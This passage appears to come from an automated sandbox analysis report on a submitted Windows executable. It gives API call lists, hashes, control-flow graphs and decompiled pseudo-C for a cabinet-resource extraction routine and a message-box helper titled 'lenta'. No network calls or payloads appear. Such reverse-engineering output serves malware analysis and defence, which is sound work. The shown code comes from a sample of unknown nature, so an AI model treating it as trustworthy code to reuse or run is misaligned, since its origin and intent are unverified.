                                                                                                                                                                                                                                            • MulDiv.KERNEL32(?,?,00000400), ref: 00A05A40
                                                                                                                                                                                                                                            • GetVolumeInformationA.KERNELBASE(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00A05A64
                                                                                                                                                                                                                                            • memset.MSVCRT ref: 00A05A7C
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 00A05A98
                                                                                                                                                                                                                                            • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 00A05AA5
                                                                                                                                                                                                                                            • SetCurrentDirectoryA.KERNEL32(?,?,?,00000010,00000000), ref: 00A05BFC
                                                                                                                                                                                                                                              • Part of subcall function 00A044B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A04518
                                                                                                                                                                                                                                              • Part of subcall function 00A044B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00A04554
                                                                                                                                                                                                                                              • Part of subcall function 00A06285: GetLastError.KERNEL32(00A05BBC), ref: 00A06285
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.419124794.0000000000A01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419111346.0000000000A00000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419141222.0000000000A08000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_a00000_fxV11fe.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 4237285672-0
                                                                                                                                                                                                                                            • Opcode ID: 033f2b3ef05af3c30883847f3e9e493d0e00dfe33f092b200e9603767f043160
                                                                                                                                                                                                                                            • Instruction ID: 4a7c76f299178f0f5e8f283762b4c38de564111f7fdc3997b3ebd94a23c5c8e4
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 033f2b3ef05af3c30883847f3e9e493d0e00dfe33f092b200e9603767f043160
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E471A2B1E0060CAFEB25DF60ED85BFB77BCEB48344F0441A9F54592181EA349E868F60
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 374 a04fe0-a0501a call a0468f FindResourceA LoadResource LockResource 377 a05020-a05027 374->377 378 a05161-a05163 374->378 379 a05057-a0505e call a04efd 377->379 380 a05029-a05051 GetDlgItem ShowWindow GetDlgItem ShowWindow 377->380 383 a05060-a05077 call a044b9 379->383 384 a0507c-a050b4 379->384 380->379 388 a05107-a0510e 383->388 389 a050b6-a050da 384->389 390 a050e8-a05104 call a044b9 384->390 391 a05110-a05117 FreeResource 388->391 392 a0511d-a0511f 388->392 398 a05106 389->398 402 a050dc 389->402 390->398 391->392 394 a05121-a05127 392->394 395 a0513a-a05141 392->395 394->395 399 a05129-a05135 call a044b9 394->399 400 a05143-a0514a 395->400 401 a0515f 395->401 398->388 399->395 400->401 404 a0514c-a05159 SendMessageA 400->404 401->378 405 a050e3-a050e6 402->405 404->401 405->390 405->398
                                                                                                                                                                                                                                            C-Code - Quality: 77%
                                                                                                                                                                                                                                            			E00A04FE0(void* __edi, void* __eflags) {
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* _t8;
                                                                                                                                                                                                                                            				struct HWND__* _t9;
                                                                                                                                                                                                                                            				int _t10;
                                                                                                                                                                                                                                            				void* _t12;
                                                                                                                                                                                                                                            				struct HWND__* _t24;
                                                                                                                                                                                                                                            				struct HWND__* _t27;
                                                                                                                                                                                                                                            				intOrPtr _t29;
                                                                                                                                                                                                                                            				void* _t33;
                                                                                                                                                                                                                                            				int _t34;
                                                                                                                                                                                                                                            				CHAR* _t36;
                                                                                                                                                                                                                                            				int _t37;
                                                                                                                                                                                                                                            				intOrPtr _t47;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t33 = __edi;
                                                                                                                                                                                                                                            				_t36 = "CABINET";
                                                                                                                                                                                                                                            				 *0xa09144 = E00A0468F(_t36, 0, 0);
                                                                                                                                                                                                                                            				_t8 = LockResource(LoadResource(0, FindResourceA(0, _t36, 0xa)));
                                                                                                                                                                                                                                            				 *0xa09140 = _t8;
                                                                                                                                                                                                                                            				if(_t8 == 0) {
                                                                                                                                                                                                                                            					return _t8;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t9 =  *0xa08584; // 0x0
                                                                                                                                                                                                                                            				if(_t9 != 0) {
                                                                                                                                                                                                                                            					ShowWindow(GetDlgItem(_t9, 0x842), 0);
                                                                                                                                                                                                                                            					ShowWindow(GetDlgItem( *0xa08584, 0x841), 5); // executed
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t10 = E00A04EFD(0, 0); // executed
                                                                                                                                                                                                                                            				if(_t10 != 0) {
                                                                                                                                                                                                                                            					__imp__#20(E00A04CA0, E00A04CC0, E00A04980, E00A04A50, E00A04AD0, E00A04B60, E00A04BC0, 1, 0xa09148, _t33);
                                                                                                                                                                                                                                            					_t34 = _t10;
                                                                                                                                                                                                                                            					if(_t34 == 0) {
                                                                                                                                                                                                                                            						L8:
                                                                                                                                                                                                                                            						_t29 =  *0xa09148; // 0x0
                                                                                                                                                                                                                                            						_t24 =  *0xa08584; // 0x0
                                                                                                                                                                                                                                            						E00A044B9(_t24, _t29 + 0x514, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            						_t37 = 0;
                                                                                                                                                                                                                                            						L9:
                                                                                                                                                                                                                                            						goto L10;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					__imp__#22(_t34, "*MEMCAB", 0xa01140, 0, E00A04CD0, 0, 0xa09140); // executed
                                                                                                                                                                                                                                            					_t37 = _t10;
                                                                                                                                                                                                                                            					if(_t37 == 0) {
                                                                                                                                                                                                                                            						goto L9;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					__imp__#23(_t34); // executed
                                                                                                                                                                                                                                            					if(_t10 != 0) {
                                                                                                                                                                                                                                            						goto L9;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					goto L8;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t27 =  *0xa08584; // 0x0
                                                                                                                                                                                                                                            					E00A044B9(_t27, 0x4ba, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            					_t37 = 0;
                                                                                                                                                                                                                                            					L10:
                                                                                                                                                                                                                                            					_t12 =  *0xa09140; // 0x0
                                                                                                                                                                                                                                            					if(_t12 != 0) {
                                                                                                                                                                                                                                            						FreeResource(_t12);
                                                                                                                                                                                                                                            						 *0xa09140 = 0;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					if(_t37 == 0) {
                                                                                                                                                                                                                                            						_t47 =  *0xa091d8; // 0x0
                                                                                                                                                                                                                                            						if(_t47 == 0) {
                                                                                                                                                                                                                                            							E00A044B9(0, 0x4f8, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					if(( *0xa08a38 & 0x00000001) == 0 && ( *0xa09a34 & 0x00000001) == 0) {
                                                                                                                                                                                                                                            						SendMessageA( *0xa08584, 0xfa1, _t37, 0);
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					return _t37;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}
















                                                                                                                                                                                                                                            0x00a04fe0
                                                                                                                                                                                                                                            0x00a04fe6
                                                                                                                                                                                                                                            0x00a04ff9
                                                                                                                                                                                                                                            0x00a0500d
                                                                                                                                                                                                                                            0x00a05013
                                                                                                                                                                                                                                            0x00a0501a
                                                                                                                                                                                                                                            0x00a05163
                                                                                                                                                                                                                                            0x00a05163
                                                                                                                                                                                                                                            0x00a05020
                                                                                                                                                                                                                                            0x00a05027
                                                                                                                                                                                                                                            0x00a05037
                                                                                                                                                                                                                                            0x00a05051
                                                                                                                                                                                                                                            0x00a05051
                                                                                                                                                                                                                                            0x00a05057
                                                                                                                                                                                                                                            0x00a0505e
                                                                                                                                                                                                                                            0x00a050a7
                                                                                                                                                                                                                                            0x00a050ad
                                                                                                                                                                                                                                            0x00a050b4
                                                                                                                                                                                                                                            0x00a050e8
                                                                                                                                                                                                                                            0x00a050e8
                                                                                                                                                                                                                                            0x00a050ee
                                                                                                                                                                                                                                            0x00a050ff
                                                                                                                                                                                                                                            0x00a05104
                                                                                                                                                                                                                                            0x00a05106
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a05106
                                                                                                                                                                                                                                            0x00a050cd
                                                                                                                                                                                                                                            0x00a050d3
                                                                                                                                                                                                                                            0x00a050da
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a050dd
                                                                                                                                                                                                                                            0x00a050e6
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a05060
                                                                                                                                                                                                                                            0x00a05060
                                                                                                                                                                                                                                            0x00a05070
                                                                                                                                                                                                                                            0x00a05075
                                                                                                                                                                                                                                            0x00a05107
                                                                                                                                                                                                                                            0x00a05107
                                                                                                                                                                                                                                            0x00a0510e
                                                                                                                                                                                                                                            0x00a05111
                                                                                                                                                                                                                                            0x00a05117
                                                                                                                                                                                                                                            0x00a05117
                                                                                                                                                                                                                                            0x00a0511f
                                                                                                                                                                                                                                            0x00a05121
                                                                                                                                                                                                                                            0x00a05127
                                                                                                                                                                                                                                            0x00a05135
                                                                                                                                                                                                                                            0x00a05135
                                                                                                                                                                                                                                            0x00a05127
                                                                                                                                                                                                                                            0x00a05141
                                                                                                                                                                                                                                            0x00a05159
                                                                                                                                                                                                                                            0x00a05159
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a0515f

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 00A0468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A046A0
                                                                                                                                                                                                                                              • Part of subcall function 00A0468F: SizeofResource.KERNEL32(00000000,00000000,?,00A02D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A046A9
                                                                                                                                                                                                                                              • Part of subcall function 00A0468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A046C3
                                                                                                                                                                                                                                              • Part of subcall function 00A0468F: LoadResource.KERNEL32(00000000,00000000,?,00A02D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A046CC
                                                                                                                                                                                                                                              • Part of subcall function 00A0468F: LockResource.KERNEL32(00000000,?,00A02D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A046D3
                                                                                                                                                                                                                                              • Part of subcall function 00A0468F: memcpy_s.MSVCRT ref: 00A046E5
                                                                                                                                                                                                                                              • Part of subcall function 00A0468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00A046EF
                                                                                                                                                                                                                                            • FindResourceA.KERNEL32(00000000,CABINET,0000000A), ref: 00A04FFE
                                                                                                                                                                                                                                            • LoadResource.KERNEL32(00000000,00000000), ref: 00A05006
                                                                                                                                                                                                                                            • LockResource.KERNEL32(00000000), ref: 00A0500D
                                                                                                                                                                                                                                            • GetDlgItem.USER32(00000000,00000842), ref: 00A05030
                                                                                                                                                                                                                                            • ShowWindow.USER32(00000000), ref: 00A05037
                                                                                                                                                                                                                                            • GetDlgItem.USER32(00000841,00000005), ref: 00A0504A
                                                                                                                                                                                                                                            • ShowWindow.USER32(00000000), ref: 00A05051
                                                                                                                                                                                                                                            • FreeResource.KERNEL32(00000000,00000000,00000010,00000000), ref: 00A05111
                                                                                                                                                                                                                                            • SendMessageA.USER32(00000FA1,00000000,00000000,00000000), ref: 00A05159
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.419124794.0000000000A01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419111346.0000000000A00000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419141222.0000000000A08000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_a00000_fxV11fe.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
                                                                                                                                                                                                                                            • String ID: *MEMCAB$CABINET
                                                                                                                                                                                                                                            • API String ID: 1305606123-2642027498
                                                                                                                                                                                                                                            • Opcode ID: 94fb6e5c80728db13ec56e51ca3e29069a31736de5c6942312f922ce7c7001c3
                                                                                                                                                                                                                                            • Instruction ID: cbbf12b1df3dae1348847fa5ce5122581e779734976b9c72a31a44a3606c5b6c
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 94fb6e5c80728db13ec56e51ca3e29069a31736de5c6942312f922ce7c7001c3
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C431C9F0B4070EBBE710EBB1BD89F67365CB71C755F040624FA05A21E2DAB99C038A55
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 406 a044b9-a044f8 407 a04679-a0467b 406->407 408 a044fe-a04525 LoadStringA 406->408 411 a0467c-a0468c call a06ce0 407->411 409 a04562-a04568 408->409 410 a04527-a0452e call a0681f 408->410 414 a0456b-a04570 409->414 420 a04530-a0453d call a067c9 410->420 421 a0453f 410->421 414->414 415 a04572-a0457c 414->415 418 a045c9-a045cb 415->418 419 a0457e-a04580 415->419 424 a04607-a04617 LocalAlloc 418->424 425 a045cd-a045cf 418->425 422 a04583-a04588 419->422 420->421 426 a04544-a04554 MessageBoxA 420->426 421->426 422->422 429 a0458a-a0458c 422->429 427 a0455a-a0455d 424->427 428 a0461d-a04628 call a01680 424->428 431 a045d2-a045d7 425->431 426->427 427->411 435 a0462d-a0463d MessageBeep call a0681f 428->435 433 a0458f-a04594 429->433 431->431 434 a045d9-a045ed LocalAlloc 431->434 433->433 436 a04596-a045ad LocalAlloc 433->436 434->427 437 a045f3-a04605 call a0171e 434->437 444 a0464e 435->444 445 a0463f-a0464c call a067c9 435->445 436->427 439 a045af-a045c7 call a0171e 436->439 437->435 439->435 448 a04653-a04677 MessageBoxA LocalFree 444->448 445->444 445->448 448->411
                                                                                                                                                                                                                                            C-Code - Quality: 94%
                                                                                                                                                                                                                                            			E00A044B9(struct HWND__* __ecx, int __edx, intOrPtr* _a4, void* _a8, int _a12, signed int _a16) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v64;
                                                                                                                                                                                                                                            				char _v576;
                                                                                                                                                                                                                                            				void* _v580;
                                                                                                                                                                                                                                            				struct HWND__* _v584;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t34;
                                                                                                                                                                                                                                            				void* _t37;
                                                                                                                                                                                                                                            				signed int _t39;
                                                                                                                                                                                                                                            				intOrPtr _t43;
                                                                                                                                                                                                                                            				signed int _t44;
                                                                                                                                                                                                                                            				signed int _t49;
                                                                                                                                                                                                                                            				signed int _t52;
                                                                                                                                                                                                                                            				void* _t54;
                                                                                                                                                                                                                                            				intOrPtr _t55;
                                                                                                                                                                                                                                            				intOrPtr _t58;
                                                                                                                                                                                                                                            				intOrPtr _t59;
                                                                                                                                                                                                                                            				int _t64;
                                                                                                                                                                                                                                            				void* _t66;
                                                                                                                                                                                                                                            				intOrPtr* _t67;
                                                                                                                                                                                                                                            				signed int _t69;
                                                                                                                                                                                                                                            				intOrPtr* _t73;
                                                                                                                                                                                                                                            				intOrPtr* _t76;
                                                                                                                                                                                                                                            				intOrPtr* _t77;
                                                                                                                                                                                                                                            				void* _t80;
                                                                                                                                                                                                                                            				void* _t81;
                                                                                                                                                                                                                                            				void* _t82;
                                                                                                                                                                                                                                            				intOrPtr* _t84;
                                                                                                                                                                                                                                            				void* _t85;
                                                                                                                                                                                                                                            				signed int _t89;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t75 = __edx;
                                                                                                                                                                                                                                            				_t34 =  *0xa08004; // 0xe10713fe
                                                                                                                                                                                                                                            				_v8 = _t34 ^ _t89;
                                                                                                                                                                                                                                            				_v584 = __ecx;
                                                                                                                                                                                                                                            				_t83 = "LoadString() Error.  Could not load string resource.";
                                                                                                                                                                                                                                            				_t67 = _a4;
                                                                                                                                                                                                                                            				_t69 = 0xd;
                                                                                                                                                                                                                                            				_t37 = memcpy( &_v64, _t83, _t69 << 2);
                                                                                                                                                                                                                                            				_t80 = _t83 + _t69 + _t69;
                                                                                                                                                                                                                                            				_v580 = _t37;
                                                                                                                                                                                                                                            				asm("movsb");
                                                                                                                                                                                                                                            				if(( *0xa08a38 & 0x00000001) != 0) {
                                                                                                                                                                                                                                            					_t39 = 1;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_v576 = 0;
                                                                                                                                                                                                                                            					LoadStringA( *0xa09a3c, _t75,  &_v576, 0x200);
                                                                                                                                                                                                                                            					if(_v576 != 0) {
                                                                                                                                                                                                                                            						_t73 =  &_v576;
                                                                                                                                                                                                                                            						_t16 = _t73 + 1; // 0x1
                                                                                                                                                                                                                                            						_t75 = _t16;
                                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                                            							_t43 =  *_t73;
                                                                                                                                                                                                                                            							_t73 = _t73 + 1;
                                                                                                                                                                                                                                            						} while (_t43 != 0);
                                                                                                                                                                                                                                            						_t84 = _v580;
                                                                                                                                                                                                                                            						_t74 = _t73 - _t75;
                                                                                                                                                                                                                                            						if(_t84 == 0) {
                                                                                                                                                                                                                                            							if(_t67 == 0) {
                                                                                                                                                                                                                                            								_t27 = _t74 + 1; // 0x2
                                                                                                                                                                                                                                            								_t83 = _t27;
                                                                                                                                                                                                                                            								_t44 = LocalAlloc(0x40, _t83);
                                                                                                                                                                                                                                            								_t80 = _t44;
                                                                                                                                                                                                                                            								if(_t80 == 0) {
                                                                                                                                                                                                                                            									goto L6;
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									_t75 = _t83;
                                                                                                                                                                                                                                            									_t74 = _t80;
                                                                                                                                                                                                                                            									E00A01680(_t80, _t83,  &_v576);
                                                                                                                                                                                                                                            									goto L23;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								_t76 = _t67;
                                                                                                                                                                                                                                            								_t24 = _t76 + 1; // 0x1
                                                                                                                                                                                                                                            								_t85 = _t24;
                                                                                                                                                                                                                                            								do {
                                                                                                                                                                                                                                            									_t55 =  *_t76;
                                                                                                                                                                                                                                            									_t76 = _t76 + 1;
                                                                                                                                                                                                                                            								} while (_t55 != 0);
                                                                                                                                                                                                                                            								_t25 = _t76 - _t85 + 0x64; // 0x65
                                                                                                                                                                                                                                            								_t83 = _t25 + _t74;
                                                                                                                                                                                                                                            								_t44 = LocalAlloc(0x40, _t25 + _t74);
                                                                                                                                                                                                                                            								_t80 = _t44;
                                                                                                                                                                                                                                            								if(_t80 == 0) {
                                                                                                                                                                                                                                            									goto L6;
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									E00A0171E(_t80, _t83,  &_v576, _t67);
                                                                                                                                                                                                                                            									goto L23;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t77 = _t67;
                                                                                                                                                                                                                                            							_t18 = _t77 + 1; // 0x1
                                                                                                                                                                                                                                            							_t81 = _t18;
                                                                                                                                                                                                                                            							do {
                                                                                                                                                                                                                                            								_t58 =  *_t77;
                                                                                                                                                                                                                                            								_t77 = _t77 + 1;
                                                                                                                                                                                                                                            							} while (_t58 != 0);
                                                                                                                                                                                                                                            							_t75 = _t77 - _t81;
                                                                                                                                                                                                                                            							_t82 = _t84 + 1;
                                                                                                                                                                                                                                            							do {
                                                                                                                                                                                                                                            								_t59 =  *_t84;
                                                                                                                                                                                                                                            								_t84 = _t84 + 1;
                                                                                                                                                                                                                                            							} while (_t59 != 0);
                                                                                                                                                                                                                                            							_t21 = _t74 + 0x64; // 0x65
                                                                                                                                                                                                                                            							_t83 = _t21 + _t84 - _t82 + _t75;
                                                                                                                                                                                                                                            							_t44 = LocalAlloc(0x40, _t21 + _t84 - _t82 + _t75);
                                                                                                                                                                                                                                            							_t80 = _t44;
                                                                                                                                                                                                                                            							if(_t80 == 0) {
                                                                                                                                                                                                                                            								goto L6;
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								_push(_v580);
                                                                                                                                                                                                                                            								E00A0171E(_t80, _t83,  &_v576, _t67);
                                                                                                                                                                                                                                            								L23:
                                                                                                                                                                                                                                            								MessageBeep(_a12);
                                                                                                                                                                                                                                            								if(E00A0681F(_t67) == 0) {
                                                                                                                                                                                                                                            									L25:
                                                                                                                                                                                                                                            									_t49 = 0x10000;
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									_t54 = E00A067C9(_t74, _t74);
                                                                                                                                                                                                                                            									_t49 = 0x190000;
                                                                                                                                                                                                                                            									if(_t54 == 0) {
                                                                                                                                                                                                                                            										goto L25;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								_t52 = MessageBoxA(_v584, _t80, "lenta", _t49 | _a12 | _a16); // executed
                                                                                                                                                                                                                                            								_t83 = _t52;
                                                                                                                                                                                                                                            								LocalFree(_t80);
                                                                                                                                                                                                                                            								_t39 = _t52;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						if(E00A0681F(_t67) == 0) {
                                                                                                                                                                                                                                            							L4:
                                                                                                                                                                                                                                            							_t64 = 0x10010;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t66 = E00A067C9(0, 0);
                                                                                                                                                                                                                                            							_t64 = 0x190010;
                                                                                                                                                                                                                                            							if(_t66 == 0) {
                                                                                                                                                                                                                                            								goto L4;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t44 = MessageBoxA(_v584,  &_v64, "lenta", _t64);
                                                                                                                                                                                                                                            						L6:
                                                                                                                                                                                                                                            						_t39 = _t44 | 0xffffffff;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E00A06CE0(_t39, _t67, _v8 ^ _t89, _t75, _t80, _t83);
                                                                                                                                                                                                                                            			}



































                                                                                                                                                                                                                                            0x00a044b9
                                                                                                                                                                                                                                            0x00a044c4
                                                                                                                                                                                                                                            0x00a044cb
                                                                                                                                                                                                                                            0x00a044d8
                                                                                                                                                                                                                                            0x00a044e4
                                                                                                                                                                                                                                            0x00a044eb
                                                                                                                                                                                                                                            0x00a044ee
                                                                                                                                                                                                                                            0x00a044ef
                                                                                                                                                                                                                                            0x00a044ef
                                                                                                                                                                                                                                            0x00a044f1
                                                                                                                                                                                                                                            0x00a044f7
                                                                                                                                                                                                                                            0x00a044f8
                                                                                                                                                                                                                                            0x00a0467b
                                                                                                                                                                                                                                            0x00a044fe
                                                                                                                                                                                                                                            0x00a04509
                                                                                                                                                                                                                                            0x00a04518
                                                                                                                                                                                                                                            0x00a04525
                                                                                                                                                                                                                                            0x00a04562
                                                                                                                                                                                                                                            0x00a04568
                                                                                                                                                                                                                                            0x00a04568
                                                                                                                                                                                                                                            0x00a0456b
                                                                                                                                                                                                                                            0x00a0456b
                                                                                                                                                                                                                                            0x00a0456d
                                                                                                                                                                                                                                            0x00a0456e
                                                                                                                                                                                                                                            0x00a04572
                                                                                                                                                                                                                                            0x00a04578
                                                                                                                                                                                                                                            0x00a0457c
                                                                                                                                                                                                                                            0x00a045cb
                                                                                                                                                                                                                                            0x00a04607
                                                                                                                                                                                                                                            0x00a04607
                                                                                                                                                                                                                                            0x00a0460d
                                                                                                                                                                                                                                            0x00a04613
                                                                                                                                                                                                                                            0x00a04617
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a0461d
                                                                                                                                                                                                                                            0x00a04623
                                                                                                                                                                                                                                            0x00a04626
                                                                                                                                                                                                                                            0x00a04628
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a04628
                                                                                                                                                                                                                                            0x00a045cd
                                                                                                                                                                                                                                            0x00a045cd
                                                                                                                                                                                                                                            0x00a045cf
                                                                                                                                                                                                                                            0x00a045cf
                                                                                                                                                                                                                                            0x00a045d2
                                                                                                                                                                                                                                            0x00a045d2
                                                                                                                                                                                                                                            0x00a045d4
                                                                                                                                                                                                                                            0x00a045d5
                                                                                                                                                                                                                                            0x00a045db
                                                                                                                                                                                                                                            0x00a045de
                                                                                                                                                                                                                                            0x00a045e3
                                                                                                                                                                                                                                            0x00a045e9
                                                                                                                                                                                                                                            0x00a045ed
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a045f3
                                                                                                                                                                                                                                            0x00a045fd
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a04602
                                                                                                                                                                                                                                            0x00a045ed
                                                                                                                                                                                                                                            0x00a0457e
                                                                                                                                                                                                                                            0x00a0457e
                                                                                                                                                                                                                                            0x00a04580
                                                                                                                                                                                                                                            0x00a04580
                                                                                                                                                                                                                                            0x00a04583
                                                                                                                                                                                                                                            0x00a04583
                                                                                                                                                                                                                                            0x00a04585
                                                                                                                                                                                                                                            0x00a04586
                                                                                                                                                                                                                                            0x00a0458a
                                                                                                                                                                                                                                            0x00a0458c
                                                                                                                                                                                                                                            0x00a0458f
                                                                                                                                                                                                                                            0x00a0458f
                                                                                                                                                                                                                                            0x00a04591
                                                                                                                                                                                                                                            0x00a04592
                                                                                                                                                                                                                                            0x00a0459b
                                                                                                                                                                                                                                            0x00a0459e
                                                                                                                                                                                                                                            0x00a045a3
                                                                                                                                                                                                                                            0x00a045a9
                                                                                                                                                                                                                                            0x00a045ad
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a045af
                                                                                                                                                                                                                                            0x00a045af
                                                                                                                                                                                                                                            0x00a045bf
                                                                                                                                                                                                                                            0x00a0462d
                                                                                                                                                                                                                                            0x00a04630
                                                                                                                                                                                                                                            0x00a0463d
                                                                                                                                                                                                                                            0x00a0464e
                                                                                                                                                                                                                                            0x00a0464e
                                                                                                                                                                                                                                            0x00a0463f
                                                                                                                                                                                                                                            0x00a04640
                                                                                                                                                                                                                                            0x00a04647
                                                                                                                                                                                                                                            0x00a0464c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a0464c
                                                                                                                                                                                                                                            0x00a04666
                                                                                                                                                                                                                                            0x00a0466d
                                                                                                                                                                                                                                            0x00a0466f
                                                                                                                                                                                                                                            0x00a04675
                                                                                                                                                                                                                                            0x00a04675
                                                                                                                                                                                                                                            0x00a045ad
                                                                                                                                                                                                                                            0x00a04527
                                                                                                                                                                                                                                            0x00a0452e
                                                                                                                                                                                                                                            0x00a0453f
                                                                                                                                                                                                                                            0x00a0453f
                                                                                                                                                                                                                                            0x00a04530
                                                                                                                                                                                                                                            0x00a04531
                                                                                                                                                                                                                                            0x00a04538
                                                                                                                                                                                                                                            0x00a0453d
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a0453d
                                                                                                                                                                                                                                            0x00a04554
                                                                                                                                                                                                                                            0x00a0455a
                                                                                                                                                                                                                                            0x00a0455a
                                                                                                                                                                                                                                            0x00a0455a
                                                                                                                                                                                                                                            0x00a04525
                                                                                                                                                                                                                                            0x00a0468c

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A04518
